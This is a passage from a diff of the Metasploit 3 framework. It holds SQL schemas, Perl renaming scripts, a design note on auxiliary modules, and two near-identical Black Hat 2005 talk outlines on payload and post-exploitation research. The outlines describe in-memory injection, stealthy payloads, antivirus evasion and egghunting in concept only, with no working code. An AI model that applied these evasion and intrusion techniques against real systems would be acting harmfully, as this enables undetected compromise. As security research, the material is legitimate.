+"@	c #C0C0C0",
+"#	c #808080",
+"$	c #585858",
+"%	c #303030",
+"                ",
+"                ",
+"                ",
+"      ...       ",
+"    ..+++..     ",
+"  ..+++@+++..   ",
+"..+++@+++++++.. ",
+".#+++++++++++$. ",
+".###+++++++$$$. ",
+"..####+++$$$$.. ",
+"% ..####$$$.. % ",
+"  % ..##$.. %   ",
+"    % ... %     ",
+"      % %       ",
+"                ",
+"                "};

data/sql/postgres.sql

@@ -0,0 +1,32 @@
+drop table hosts;
+
+create table hosts (
+id INTEGER PRIMARY KEY NOT NULL,
+address VARCHAR(16) UNIQUE,
+comm VARCHAR(255),
+name VARCHAR(255),
+state VARCHAR(255),
+info VARCHAR(1024)
+);
+
+drop table services;
+
+create table services (
+id INTEGER PRIMARY KEY NOT NULL,
+host_id INTEGER,
+port INTEGER NOT NULL,
+proto VARCHAR(16) NOT NULL,
+state VARCHAR(255),
+name VARCHAR(255),
+info VARCHAR(1024)
+);
+
+drop table vulns;
+
+create table vulns (
+id INTEGER PRIMARY KEY NOT NULL,
+service_id INTEGER,
+name VARCHAR(255),
+data TEXT
+);
+

data/sql/sqlite.sql

@@ -0,0 +1,29 @@
+drop table hosts;
+
+create table hosts (
+'id' INTEGER PRIMARY KEY NOT NULL,
+'address' VARCHAR(16) UNIQUE,
+'comm' VARCHAR(255),
+'name' VARCHAR(255),
+'state' VARCHAR(255),
+'desc' VARCHAR(1024)
+);
+
+drop table services;
+
+create table services (
+'id' INTEGER PRIMARY KEY NOT NULL,
+'host_id' INTEGER,
+'port' INTEGER NOT NULL,
+'proto' VARCHAR(16) NOT NULL,
+'state' VARCHAR(255),
+'name' VARCHAR(255),
+'desc' VARCHAR(1024)
+);
+
+create table vulns (
+'id' INTEGER PRIMARY KEY NOT NULL,
+'service_id' INTEGER,
+'name' VARCHAR(255),
+'data' TEXT
+);

dev/adminy/movey.pl

@@ -0,0 +1,39 @@
+#/usr/bin/perl
+use strict;
+
+die if @ARGV != 1;
+
+move($ARGV[0]);
+
+sub old_to_new {
+	my $name = shift;
+
+	$name =~ s/^([A-Z])/lc($1)/ge;
+	$name =~ s/([A-Z])/"_" . lc($1)/ge;
+
+	return($name);
+}
+
+sub move {
+	my $dir = shift;
+	my @entries;
+	
+	opendir(DIR, $dir) || die "Can't open $dir: $!\n";
+	@entries = readdir(DIR);
+	closedir(DIR);
+
+	foreach my $entry (@entries) {
+		next if($entry eq 'Attic' || $entry =~ /^\./);
+
+		my $path = $dir . '/' . $entry;
+		my $newpath = $dir . '/' . old_to_new($entry);
+
+		if(-d $path) {
+			move($path);
+		}
+
+		print "$path -> $newpath\n";
+		rename($path, $newpath) || die("BAH!");
+
+	}
+}

dev/adminy/movey_requires.pl

@@ -0,0 +1,27 @@
+#!/usr/bin/perl -pi
+use strict;
+
+s/require '(.*?)'/"require '" . waka($1) . "'"/ge;
+
+sub waka {
+	my $required = shift;
+
+	my @pieces = split('/', $required);
+	map { $_ = old_to_new($_) } @pieces;
+	my $new = join('/', @pieces);
+
+	return $new;
+}
+
+sub old_to_new {
+	my $name = shift;
+
+	if(uc($name) eq $name) {
+		return(lc($name));
+	}
+
+	$name =~ s/^([A-Z])/lc($1)/ge;
+	$name =~ s/([A-Z])/"_" . lc($1)/ge;
+
+	return($name);
+}

dev/aux_design.txt

@@ -0,0 +1,48 @@
+Auxiliary Module Design
+-----------------------
+
+The goal of this document is to define the requirements and basic
+implementation of Metasploit v3.0 Auxiliary Modules. Auxiliary modules have a
+unique role in the Framework in that they can do just about anything.
+Auxiliary modules work similar to exploits, in that the user selects a module,
+configures, and launches it, but differs in that they do not execute arbitrary
+code on target systems. 
+
+
+Design Goals
+------------
+
+Auxiliary modules should be capable of performing reconnaisance activities,
+such as sending probes or listening to the network, and exporting the data
+into a persistent storage system accessible to the rest of the Framework. Not
+all auxiliary modules produce this type of data, some may perform intrusive
+actions, such as file retrieval or modifying access credentials.
+
+An Auxiliary module has the ability to define new commands and then process
+these commands. Any user interface that sypports Auxiliary modules needs to
+take into account this fact and allow these optional commands to be accessed.
+
+Unlike exploits, auxiliary modules do not use Targets, instead they support
+what we call Actions. An Action is an option, that when set, causes the
+auxiliary module to perform a selected task. Between the extensible command
+set and the Actions system, a single auxiliary module is capable performing an
+almost infinite number of tasks.
+
+An example would be a module that performs various tasks against a Microsoft
+SQL Server. This module would only support the default command of 'run', but
+could allow the user to send a UDP probe and display the data, perform an
+account brute force, or scan all open ports for an exposed MSSQL DCERPC
+interface. 
+
+
+
+
+
+Storage
+-------
+
+
+
+
+Requirements
+------------

dev/bh/blog.txt

@@ -0,0 +1,33 @@
+
+Blog entry, Stardate April, 2005
+
+We have recently been on a new shellcode kick, but this time it's not about
+making them smaller. We're currently working on building very power new
+post-exploitation shellcode and toolkits, and a very powerful unified API
+to expose their functionality. This will allow us to diverge from precanned
+payloads, allowing users to quickly build power and portable post-exploitation
+tools. We've have built strongly upon our Windows DLL injection, and are
+working on extending similar functionality to the land of Unix.  We're also
+working hard on the next version of Metasploit, which follows this same
+philosophy of emedability and extensablity, allowing users to build their own
+tools on top of our framework. Our previous work was all about exploit
+frameworks. Our new approach we are really building more of a hacker tool
+framework, allowing very strong automation and customization.
+
+
+
+ignore this.....
+
+With Metasploit 3.0 on the horizon, we've been working hard on design and
+building components to take a very different focus.  Currently Metasploit 2
+is very much an end user tool, and doing anything custom isn't so elegant.
+The approach we are taking in Metasploit 3, is "Metasploit as a library".  We
+are working very hard on writing post-exploitation suites for different
+platforms, and then building a unified API that they all adhere to.  This will
+allow you to directly script remote hosts, proxying file operations, network
+communications, and transparent channelized communication.  The new system is
+being designed to be threadsafe to a high degree, forcing us to rethink and
+redesign many of our tools and protocols.  Our new system is design to allow
+you to do things like run 10 exploits concurrently, all "pivoting" through
+a host you previously owned.  Along with this new feature set, we are still
+concentrating on keeping things off disk, all in-memory injection, etc.

dev/bh/outline-new.txt

@@ -0,0 +1,383 @@
+[12:52:34] -> *spewnum* damn you! :) fine, we'll just call them payloads, and then we'll break it up as Payload Stagers, Payload Stages, and
+              Post-exploitation suites, does that sound coo?     
+
+I. Introduction
+   A. Who are we?
+      1. spoonm
+      2. skape
+      3. Why do we do this hoodoo voodoo
+   B. Exploit Technology
+      1. Three Phases of Exploitation
+         a. Pre-exploitation
+         b. Exploitation
+         c. Post-exploitation
+      2. Pre-exploitation - Before the attack
+         a. Find the bug
+         b. Write exploits, payloads, tools
+      3. Exploitation - Leveraging the vulnerability
+         a. Find a target
+         c. Gather info, setup tools, prepare listeners, etc
+         b. Launch attack
+      4. Post-Exploitation - Manipulating the target
+         a. Command shell redirection
+         b. Arbitrary command execution
+         c. Pivoting payloads
+         d. Advanced payload interaction
+   B. Where do we stand?
+      1. Pre-exploitation
+         a. Robust and elegant encoders do exist
+            i. SkyLined's alpha-numeric encoder
+            ii. Spoonm's Shikata Ga Nai
+         b. Payload encoders generally taken for granted
+	    NOTE: maybe expand a little bit more here...
+            i. Most encoders are static with a variable key
+            ii. IDS able to signature static decoder stubs
+         c. NOP generation hasn't publically changed much
+            i. PoC exploits generally use predictable nops, if any
+            ii. ADMmutate easily signatured by most NIDS (Snort, Fnord)
+            iii. Not considered very important to many researchers
+         d. NIDS deployments are playing chase the tail
+            i. The mouse always has the advantage; NIDS is reactive
+            ii. Advanced nops and encoders push NIDS to its limits
+	    NOTE: maybe talk about how complex some things are to signature,
+	          for example, RPC, application level fragmentation, etc.
+      2. Exploitation
+         a. Techniques have become very mature
+            i. Linux/BSD exploitation techniques largely unchanged
+            ii. Win32 heap overflows now more reliable (oded/shok)
+            iii. Win32 SEH overwrites make exploitation easy, even on XPSP2
+         b. Exploitation topics have been beaten to death
+      3. Post-exploitation
+         a. Common payloads are limited
+            i. Command shell interaction has poor automation support
+            ii. Limited to the command set that the interpreter provides
+            iii. Bounded by the utilities installed on the target machine
+            iv. Restrictive environments (chroot) can hinder command execution
+            v. HIPS vendors becoming more adept at detecting basic payloads
+               - LoadLibraryA from the stack, etc (mcafee 8.0i)
+	    NOTE: I think it would be important here to talk even about the
+	          issues with "advantage" payloads, ala Core Impact and CANVAS.
+		  We should look into them more, but I have a hunch that they
+		  aren't that well writte, don't have that great of APIs
+		  exposed, and aren't very extensible for a 3rd party not
+		  on the team authoring the product.  Even the "advanced" stuff
+		  I think has a lot of issues.
+         b. Communication vectors largely unchanged
+            i. Reverse and port-bind payloads still the most common
+            ii. Findsock style payloads still unused by PoC exploits
+            iii. Alternative communication vectors rarely discussed
+         c. Pivoting technology exists
+            i. Core ST described system call proxying in 2002
+            ii. Metasploit's (2.3) meterpreter provides basic network pivoting
+   C. What will we discuss?
+      1. Pre-exploitation Research
+         a. NOP generation
+            i. Opty2
+         b. Encoders
+            i. Additive feedback encoders
+            ii. Shikata Ga Nai
+      2. Post-Exploitation Research
+         a. Library Injection
+            i. Facilitates things like Meterpreter and VNC injection
+         b. VNC Injection
+            i. Introduced at blackhat04 with the Metasploit 2.2 release
+         c. Meterpreter & dN
+            i. The cross-platform post-exploitation suite
+	 NOTE: dN is weak, but maybe talk about it from a different perspective,
+	       just about allowing the attacker to really orcistrate everything
+	       down even to the system call level.  Definitely should talk a
+	       bunch about your ninjaness with meterp TLV stylies, and the
+	       channelized throwdown. (</thuggin>).
+      3. Payload Research
+         a. PassiveX
+            i. Taking advantage of ActiveX controls
+	    ii. Taking advantage of soccer playing sisters.
+         b. Ordinal Stagers
+            i. Tiny network capable stagers
+         c. Egghunt (maybe?)
+            i. Small payload capable of locating a larger payload
+            ii. Useful for exploits with limited space
+	    NOTE: Egghunt is cool, and we can just talk a bit about how we
+	          extracted the syscalls, and how all of our tools come together
+		  to do stuff like that really fast/easily.  Oded mentioned he
+		  saw the page and thought it was cool, he wondered how you
+		  got the prototypes...
+II. Pre-exploitation
+   A. OptyNop2
+      1. Creation and benefits of multi-byte nopsleds
+   B. Additive feedback encoders
+   C. Shikata Ga Nai
+      1. High permutation shellcode through simple dependency mappings
+III. Post-exploitation
+   A. Library Injection
+      1. Overview
+         a. Paper published in 04/2004
+         b. Provides advanced code execution
+         c. Code can be written in any language that can compile down
+            to a shared object.
+         d. Allows developer to use all of the APIs exposed to a normal
+            application.
+         e. Detailed explanation can be found in included resources
+            (include lib inject paper)
+      2. Two types of library injection
+         a. On-Disk
+            i. Library is loaded from the target's harddrive or via a
+               file share.
+            ii. Can be detected by AV products due to fs access
+         b. In-Memory
+            i. Library is uploaded to the target and loaded from memory
+               without touching the disk
+            ii. Evades file system filter drivers, such as those
+                provided by AV companies
+            iii. Not touching the disk means no forensic trace
+            iv. VirtualLock prevents swapping to disk, but requires admin
+      3. In-memory library injection on Windows
+         a. System calls used by the library loader are hooked
+            i. NtCreateFile
+            ii. NtMapViewOfSection
+            iii. etc
+         b. Unique image name is used to identify the image to image that
+            is in memory
+         c. System call hooks are removed so that future injectino can
+            occur
+         d. Alternative approaches
+            i. Could do client-side relocations, but would need to handle
+               import processing
+      4. In-memory library injection on Linux/BSD
+         a. No known public implementations
+         b. Requires alternate approach
+            i. Hooking API routines not always possible -- symtab not
+               mapped into memory
+            ii. libc symbol version mismatches lead to linking nightmares
+         c. Client-side relocations seem most feasible
+            i. Remote side maps a region of memory and sends the client 
+               the base address
+            ii. Client processes relocations and transmits the relocated
+                image as its mapped segment would appear
+            iii. Requires locating rtld base so that PLT lookups will
+                 work
+   B. VNC Injection
+      1. Implements VNC as an injectable DLL
+         a. Uses RealVNC as the code-base
+         b. VNC communication uses the exploit connection
+         c. No physical trace is left of the VNC server
+         d. Can operate regardless of existing VNC installations
+      2. Easy way to illustrate insecurities
+         a. Suits understand mouse movement better than black box command 
+            prompts
+   C. Meterpreter
+      1. Generic post-exploitation suite
+         a. Based on library injection
+         b. Uses the established exploit connection
+            i. Especially powerful with findsock payloads; no new connection
+         c. Executes entirely from memory
+         d. No new processes or file access required for the payload to
+            succeed
+         e. Detailed explanation can be found in included resources
+            (include meterpreter paper)
+      2. Extension system provides advanced automation support
+         a. No need to hand write tedious assembly
+         b. Existing native code can be ported to a meterpreter extension
+      3. Architecture
+         a. Design goals
+            i. Very flexible protocol; should adapt to extension requirements
+            ii. Exposure of a channelized communication system to extensions
+            iii. Stealth operation
+            iv. Should be portable to various operating systems
+            v. Client from one platform should work with server on another
+               platform
+         b. Protocol
+            i. Uses TLVs (Type-Length-Value) to support arbitrary data
+               passing.
+            ii. TLVs allow the packet parser to be oblivious to the structure
+                of the value field
+            iii. Type field is broken down into meta types
+      4. Core interface
+         a. Overview
+            i. Minimal interface to support the loading of extensions
+            ii. Implements the basic packet transmission and dispatching
+                facilities
+            iii. Exposes channel allocation and management to extensions
+         b. Advanced features
+            i. Migrating the server instance between processes
+      5. The ``stdapi'' extension
+         a. Overview
+            i. Included in Metasploit 3.0
+            ii. Provides access to some of the common subsystems of the
+                target operating system
+            iii. Allows for easy automation and implementation of robust
+                 post-exploitation scripts
+         b. File System
+            i. File and directory interaction
+            ii. Files can be uploaded and downloaded between the
+                attacker and the target
+         c. Network
+            i. Transparent network pivoting
+            ii. Route table enumeration and manipulation
+            iii. Local interface enumeration
+         d. Process
+            i. Process execution, optionally with channelized IO
+            ii. Enumeration of running processes
+            iii. Modification of arbitrary memory
+            iv. Creation and modification of running threads
+            v. Loading and interacting with shared object files
+         e. Registry
+            i. General registry API access
+            ii. Opening, creating, and removing registry keys
+            iii. Setting, querying, and deleting registry values
+            iv. Enumeration of both keys and values
+         f. User interface
+            i. Disabling local user interaction via the keyboard
+               and/or mouse (similar to VNC)
+            ii. Idle timeout checking to see how long it's been
+                since the user did something interactive
+      6. The ``priv'' extension
+         a. Still in development
+         b. Exposes an interface to escalating local privileges
+            through local vulnerabilities
+         c. SAM dumping support similar to pwdump3
+   D. dN
+      1. Simple low-footprint post-exploitation tool
+      2. Useful to scope out execution enviroment, then bootstrap other tools
+IV. Payload Research
+   A. PassiveX
+      1. Overview
+         a. Post-exploitation payload
+         b. A derivative of On-Disk library injection that uses
+            ActiveX controls
+         c. Supports arbitrary DLL injection in any language that can
+            be compiled as an ActiveX control (C++, VB, etc)
+         d. Detailed analysis can be found in included resources
+            (include passivex paper)
+      2. Payload Implementation
+         a. Disables iexplore Internet zone restrictions on 
+            ActiveX controls
+            i. Modifies four registry values that are stored per-user
+         b. Launches a hidden iexplore at a URL with an embedded
+            OCX
+            i. The OCX does not have to be signed
+            ii. No user interaction is required
+            iii. OCX is automatically downloaded, registered, and loaded
+                 into the browser's context
+      3. Sample HTTP tunneling ActiveX control
+         a. HTTP GET/POST used to build tunnel to attacker
+            i. Uses the WININET API
+            ii. Outbound traffic from target machine encapsulated in POST
+                request
+            iii. Inbound traffic from attacker encapsulated in GET response
+            iv. Proxy configuration automatically inherited
+            v. Requires HTTP server capable of performing encap/decap on the 
+               HTTP packets
+         b. Streaming connection through HTTP tunnel can be created
+            i. socketpair doesn't exist natively on win32 but can be simulated
+               with a local listener
+            ii. Streaming abstraction allows advanced payloads to transparently
+                use the HTTP transport (Meterpreter, VNC)
+            iii. Local listener less covert, but highly beneficial
+      4. Pros
+         a. Bypasses restrictive outbound filters
+         b. Re-uses proxy configuration
+         c. Looks like normal user traffic
+         d. Allows full access to the win32 API like all forms of 
+            library injection
+      5. Cons
+         a. Touches the disk
+         b. Requires administrative access
+            i. Internet Explorer prohibits the downloading of 
+               ActiveX controls as non-admin
+   B. Windows Ordinal Stagers
+      1. Overview
+         a. Technique from Oded's lightning talk from core04
+         b. Uses static ordinals to locate winsock symbol addresses
+         c. Compatible with all versions of Windows
+         d. 92 byte reverse stager, 93 byte findsock stager
+         e. Detailed explanation can be found in included resources
+            (include spoonm ordinal paper)
+      2. Reverse Ordinal Stager
+         a. Walks InitOrderModuleList searching for ws2_32
+         b. Uses static ordinals to index the export table
+         c. Creates fd with socket
+         d. Chains connect and recv frames
+         e. Returns into buffer read in from file descriptor
+   C. Egghunting
+      1. Overview
+         a. Small stub payload that can search for a larger payload
+         b. Useful for exploits that have limited payload space but can
+            stash more payload elsewhere in memory
+         c. Example exploits include the IE object type vulnerability.
+         d. Goal is to safely search target address space for the larger
+            payload.
+         e. Larger payload is located by searching for an egg that is prepended
+            to it.
+         f. Detailed analysis can be found in included resources
+            (include egghunt paper)
+      2. Two primary methods of egghunting on Windows
+         a. SEH
+            1. 60 bytes in size, searches for an 8 byte egg, compatible with all
+               versions of Windows (including 9x)
+            2. Installs a custom exception handler
+            3. Begins walking the address space
+               i. When a bad address is encounter, the current pointer is
+                  incremented by PAGE_SIZE
+               ii. When a mismatch of the egg is encountered, the current pointer
+                   is incremented by one
+            4. Each address is compared against the 8-byte egg
+               i. Bad addresses will throw exceptions which will be handled
+                  by the custom exception handler
+            5. When the egg is found, jump past the egg into the larger payload
+         b. System call
+            1. Very small stub (32 bytes), searches for an 8 byte egg, only
+               compatible with NT+
+            2. Uses a non-intrusive system call (NtDisplayString) to search validate
+               addresses
+               i. Same page walking logic as SEH is used
+            3. When the egg is found, jump past the egg into the larger payload
+      3. One primary method of egghunting on Linux
+         a. System call
+            1. 30 bytes in size, searches for an 8 byte egg
+            2. System call technique applies to other UNIX variants as well
+            3. Uses the sigaction system call to validate 16 bytes at once
+            4. Pros
+               i. Very small
+            5. Cons
+               i. Corner cases may cause it to be unstable
+V. The Complete Picture - Metasploit 3.0
+   A. The power of pre-exploitation prepartion
+      1. Abstract NOP generation
+      2. Abstract payload encoding
+      3. Abstract exploit connection handlers
+         i. Bind handler
+         ii. Reverse handler
+         iii. Findsock handler
+   B. The power of exploit generalization
+      1. Standardized exploit creation interface
+         i. Robust target definitions
+         ii. Detailed exploit implementation information
+         iii. Entirely payload independent, no hardcoding paylaods
+   C. The power of post-exploitation automation
+      1. Complicated tasks made simple with scripting
+         i. Want to download a targets entire harddrive?
+         ii. Want to disable local user interaction?
+         iii. Want to upload and play an mp3 on the target?
+         iv. Want to 'be' on the target's network?
+      2. Standard interface means cross platform support
+VI. Conclusion - where do we go from here?
+   A. Future Post-exploitation research
+      1. Mesh network support 
+      2. Expansion of the stdapi described in this document
+
+included resources:
+   http://www.hick.org/code/skape/papers/egghunt-shellcode.pdf
+   http://www.hick.org/code/skape/papers/meterpreter.pdf
+   http://www.hick.org/code/skape/papers/remote-library-injection.pdf
+   http://www.hick.org/code/skape/papers/passivex.pdf [not released yet]
+   http://www.metasploit.com/users/spoonm/ordinals.txt
+	
+cited material:
+STRIDE:
+   http://www.ics.forth.gr/carv/acs/ACS/Activities/papers/stride-IFIP-SEC05.pdf
+
+syscall proxy:
+   http://www.coresecurity.com/files/files/11/SyscallProxying.pdf
+
+

dev/bh/outline.txt

@@ -0,0 +1,378 @@
+04/19/2005
+
+Note:
+
+We've tried to include most of the topics that will be covered in our
+presentation.  However, many of these things will be discussed, but will not be
+our main concentration.  The majority of our presentation will be around topic
+V. C, our new post-exploitation advances, and how they will be designed and
+integrated into Metasploit 3.  Metasploit 3 won't be finished in time for
+Blackhat, but more important than the software itself is the work we've done
+on developing the individual components that it will be built from.
+
+This outline is pretty indepth, so it's hard to pick out all the nuggets of
+coolness.  We've developed many really useful technologies in the area of
+payload development.  These are things we've created since last year's
+Blackhat, including many advances in polymorphic shellcode, and
+high-permutation attacks.
+
+I. Introduction
+   A. Who are we?
+      1. spoonm
+      2. skape
+   B. Exploit Technology
+      1. Three Phases of Exploitation
+         a. Pre-exploitation
+         b. Exploitation
+         c. Post-exploitation
+      2. Pre-exploitation - Preparing the payload
+         a. NOP generation
+         b. Payload encoders
+         c. Connection handler initialization
+      3. Exploitation - Leveraging the vulnerability
+         a. Stack overflows
+         c. Heap overflows
+         b. SEH overwrites
+         d. Arbitrary pointer overwrites
+      4. Post-Exploitation - Manipulating the target
+         a. Command shell redirection
+         b. Arbitrary command execution
+         c. Pivoting payloads
+         d. Advanced payload interaction
+   B. Where do we stand?
+      1. Pre-exploitation
+         a. Robust and elegant encoders do exist
+            i. SkyLined's alpha-numeric encoder
+            ii. Spoonm's Shikata Ga Nai
+         b. Payload encoders generally taken for granted
+            i. Most encoders are static with a variable key
+            ii. IDS able to signature static decoder stubs
+         c. NOP generation hasn't publically changed much
+            i. PoC exploits generally use predictable nops, if any
+            ii. ADMmutate easily signatured by most NIDS (Snort, Fnord)
+            iii. Not considered very important to many researchers
+         d. NIDS deployments are playing chase the tail
+            i. The mouse always has the advantage; NIDS is reactive
+            ii. Advanced nops and encoders push NIDS to its limits
+      2. Exploitation
+         a. Techniques have become very mature
+            i. Linux/BSD exploitation techniques largely unchanged
+            ii. Win32 heap overflows now more reliable (oded/shok)
+            iii. Win32 SEH overwrites make exploitation easy, even on XPSP2
+         b. Exploitation topics have been beaten to death
+      3. Post-exploitation
+         a. Common payloads are limited
+            i. Command shell interaction has poor automation support
+            ii. Limited to the command set that the interpreter provides
+            iii. Bounded by the utilities installed on the target machine
+            iv. Restrictive environments (chroot) can hinder command execution
+            v. HIPS vendors becoming more adept at detecting basic payloads
+               - LoadLibraryA from the stack, etc (mcafee 8.0i)
+         b. Communication vectors largely unchanged
+            i. Reverse and port-bind payloads still the most common
+            ii. Findsock style payloads still unused by PoC exploits
+            iii. Alternative communication vectors rarely discussed
+         c. Pivoting technology exists
+            i. Core ST described system call proxying in 2002
+            ii. Metasploit's (2.3) meterpreter provides basic network pivoting
+   C. What will we discuss?
+      1. Pre-exploitation Research
+         a. NOP generation
+            i. Opty2
+         b. Encoders
+            i. Additive feedback encoders
+            ii. Shikata Ga Nai
+      2. Post-Exploitation Research
+         a. Library Injection
+            i. Facilitates things like Meterpreter and VNC injection
+         b. VNC Injection
+            i. Introduced at blackhat04 with the Metasploit 2.2 release
+         c. Meterpreter & dN
+            i. The cross-platform post-exploitation suite
+      3. Payload Research
+         a. PassiveX
+            i. Taking advantage of ActiveX controls
+         b. Ordinal Stagers
+            i. Tiny network capable stagers
+         c. Egghunt (maybe?)
+            i. Small payload capable of locating a larger payload
+            ii. Useful for exploits with limited space
+II. Pre-exploitation
+   A. OptyNop2
+      1. Creation and benefits of multi-byte nopsleds
+   B. Additive feedback encoders
+   C. Shikata Ga Nai
+      1. High permutation shellcode through simple dependency mappings
+III. Post-exploitation
+   A. Library Injection
+      1. Overview
+         a. Paper published in 04/2004
+         b. Provides advanced code execution
+         c. Code can be written in any language that can compile down
+            to a shared object.
+         d. Allows developer to use all of the APIs exposed to a normal
+            application.
+         e. Detailed explanation can be found in included resources
+            (include lib inject paper)
+      2. Two types of library injection
+         a. On-Disk
+            i. Library is loaded from the target's harddrive or via a
+               file share.
+            ii. Can be detected by AV products due to fs access
+         b. In-Memory
+            i. Library is uploaded to the target and loaded from memory
+               without touching the disk
+            ii. Evades file system filter drivers, such as those
+                provided by AV companies
+            iii. Not touching the disk means no forensic trace
+            iv. VirtualLock prevents swapping to disk, but requires admin
+      3. In-memory library injection on Windows
+         a. System calls used by the library loader are hooked
+            i. NtCreateFile
+            ii. NtMapViewOfSection
+            iii. etc
+         b. Unique image name is used to identify the image to image that
+            is in memory
+         c. System call hooks are removed so that future injectino can
+            occur
+         d. Alternative approaches
+            i. Could do client-side relocations, but would need to handle
+               import processing
+      4. In-memory library injection on Linux/BSD
+         a. No known public implementations
+         b. Requires alternate approach
+            i. Hooking API routines not always possible -- symtab not
+               mapped into memory
+            ii. libc symbol version mismatches lead to linking nightmares
+         c. Client-side relocations seem most feasible
+            i. Remote side maps a region of memory and sends the client 
+               the base address
+            ii. Client processes relocations and transmits the relocated
+                image as its mapped segment would appear
+            iii. Requires locating rtld base so that PLT lookups will
+                 work
+   B. VNC Injection
+      1. Implements VNC as an injectable DLL
+         a. Uses RealVNC as the code-base
+         b. VNC communication uses the exploit connection
+         c. No physical trace is left of the VNC server
+         d. Can operate regardless of existing VNC installations
+      2. Easy way to illustrate insecurities
+         a. Suits understand mouse movement better than black box command 
+            prompts
+   C. Meterpreter
+      1. Generic post-exploitation suite
+         a. Based on library injection
+         b. Uses the established exploit connection
+            i. Especially powerful with findsock payloads; no new connection
+         c. Executes entirely from memory
+         d. No new processes or file access required for the payload to
+            succeed
+         e. Detailed explanation can be found in included resources
+            (include meterpreter paper)
+      2. Extension system provides advanced automation support
+         a. No need to hand write tedious assembly
+         b. Existing native code can be ported to a meterpreter extension
+      3. Architecture
+         a. Design goals
+            i. Very flexible protocol; should adapt to extension requirements
+            ii. Exposure of a channelized communication system to extensions
+            iii. Stealth operation
+            iv. Should be portable to various operating systems
+            v. Client from one platform should work with server on another
+               platform
+         b. Protocol
+            i. Uses TLVs (Type-Length-Value) to support arbitrary data
+               passing.
+            ii. TLVs allow the packet parser to be oblivious to the structure
+                of the value field
+            iii. Type field is broken down into meta types
+      4. Core interface
+         a. Overview
+            i. Minimal interface to support the loading of extensions
+            ii. Implements the basic packet transmission and dispatching
+                facilities
+            iii. Exposes channel allocation and management to extensions
+         b. Advanced features
+            i. Migrating the server instance between processes
+      5. The ``stdapi'' extension
+         a. Overview
+            i. Included in Metasploit 3.0
+            ii. Provides access to some of the common subsystems of the
+                target operating system
+            iii. Allows for easy automation and implementation of robust
+                 post-exploitation scripts
+         b. File System
+            i. File and directory interaction
+            ii. Files can be uploaded and downloaded between the
+                attacker and the target
+         c. Network
+            i. Transparent network pivoting
+            ii. Route table enumeration and manipulation
+            iii. Local interface enumeration
+         d. Process
+            i. Process execution, optionally with channelized IO
+            ii. Enumeration of running processes
+            iii. Modification of arbitrary memory
+            iv. Creation and modification of running threads
+            v. Loading and interacting with shared object files
+         e. Registry
+            i. General registry API access
+            ii. Opening, creating, and removing registry keys
+            iii. Setting, querying, and deleting registry values
+            iv. Enumeration of both keys and values
+         f. User interface
+            i. Disabling local user interaction via the keyboard
+               and/or mouse (similar to VNC)
+            ii. Idle timeout checking to see how long it's been
+                since the user did something interactive
+      6. The ``priv'' extension
+         a. Still in development
+         b. Exposes an interface to escalating local privileges
+            through local vulnerabilities
+         c. SAM dumping support similar to pwdump3
+   D. dN
+      1. Simple low-footprint post-exploitation tool
+      2. Useful to scope out execution enviroment, then bootstrap other tools
+IV. Payload Research
+   A. PassiveX
+      1. Overview
+         a. Post-exploitation payload
+         b. A derivative of On-Disk library injection that uses
+            ActiveX controls
+         c. Supports arbitrary DLL injection in any language that can
+            be compiled as an ActiveX control (C++, VB, etc)
+         d. Detailed analysis can be found in included resources
+            (include passivex paper)
+      2. Payload Implementation
+         a. Disables iexplore Internet zone restrictions on 
+            ActiveX controls
+            i. Modifies four registry values that are stored per-user
+         b. Launches a hidden iexplore at a URL with an embedded
+            OCX
+            i. The OCX does not have to be signed
+            ii. No user interaction is required
+            iii. OCX is automatically downloaded, registered, and loaded
+                 into the browser's context
+      3. Sample HTTP tunneling ActiveX control
+         a. HTTP GET/POST used to build tunnel to attacker
+            i. Uses the WININET API
+            ii. Outbound traffic from target machine encapsulated in POST
+                request
+            iii. Inbound traffic from attacker encapsulated in GET response
+            iv. Proxy configuration automatically inherited
+            v. Requires HTTP server capable of performing encap/decap on the 
+               HTTP packets
+         b. Streaming connection through HTTP tunnel can be created
+            i. socketpair doesn't exist natively on win32 but can be simulated
+               with a local listener
+            ii. Streaming abstraction allows advanced payloads to transparently
+                use the HTTP transport (Meterpreter, VNC)
+            iii. Local listener less covert, but highly beneficial
+      4. Pros
+         a. Bypasses restrictive outbound filters
+         b. Re-uses proxy configuration
+         c. Looks like normal user traffic
+         d. Allows full access to the win32 API like all forms of 
+            library injection
+      5. Cons
+         a. Touches the disk
+         b. Requires administrative access
+            i. Internet Explorer prohibits the downloading of 
+               ActiveX controls as non-admin
+   B. Windows Ordinal Stagers
+      1. Overview
+         a. Technique from Oded's lightning talk from core04
+         b. Uses static ordinals to locate winsock symbol addresses
+         c. Compatible with all versions of Windows
+         d. 92 byte reverse stager, 93 byte findsock stager
+         e. Detailed explanation can be found in included resources
+            (include spoonm ordinal paper)
+      2. Reverse Ordinal Stager
+         a. Walks InitOrderModuleList searching for ws2_32
+         b. Uses static ordinals to index the export table
+         c. Creates fd with socket
+         d. Chains connect and recv frames
+         e. Returns into buffer read in from file descriptor
+   C. Egghunting
+      1. Overview
+         a. Small stub payload that can search for a larger payload
+         b. Useful for exploits that have limited payload space but can
+            stash more payload elsewhere in memory
+         c. Example exploits include the IE object type vulnerability.
+         d. Goal is to safely search target address space for the larger
+            payload.
+         e. Larger payload is located by searching for an egg that is prepended
+            to it.
+         f. Detailed analysis can be found in included resources
+            (include egghunt paper)
+      2. Two primary methods of egghunting on Windows
+         a. SEH
+            1. 60 bytes in size, searches for an 8 byte egg, compatible with all
+               versions of Windows (including 9x)
+            2. Installs a custom exception handler
+            3. Begins walking the address space
+               i. When a bad address is encounter, the current pointer is
+                  incremented by PAGE_SIZE
+               ii. When a mismatch of the egg is encountered, the current pointer
+                   is incremented by one
+            4. Each address is compared against the 8-byte egg
+               i. Bad addresses will throw exceptions which will be handled
+                  by the custom exception handler
+            5. When the egg is found, jump past the egg into the larger payload
+         b. System call
+            1. Very small stub (32 bytes), searches for an 8 byte egg, only
+               compatible with NT+
+            2. Uses a non-intrusive system call (NtDisplayString) to search validate
+               addresses
+               i. Same page walking logic as SEH is used
+            3. When the egg is found, jump past the egg into the larger payload
+      3. One primary method of egghunting on Linux
+         a. System call
+            1. 30 bytes in size, searches for an 8 byte egg
+            2. System call technique applies to other UNIX variants as well
+            3. Uses the sigaction system call to validate 16 bytes at once
+            4. Pros
+               i. Very small
+            5. Cons
+               i. Corner cases may cause it to be unstable
+V. The Complete Picture - Metasploit 3.0
+   A. The power of pre-exploitation prepartion
+      1. Abstract NOP generation
+      2. Abstract payload encoding
+      3. Abstract exploit connection handlers
+         i. Bind handler
+         ii. Reverse handler
+         iii. Findsock handler
+   B. The power of exploit generalization
+      1. Standardized exploit creation interface
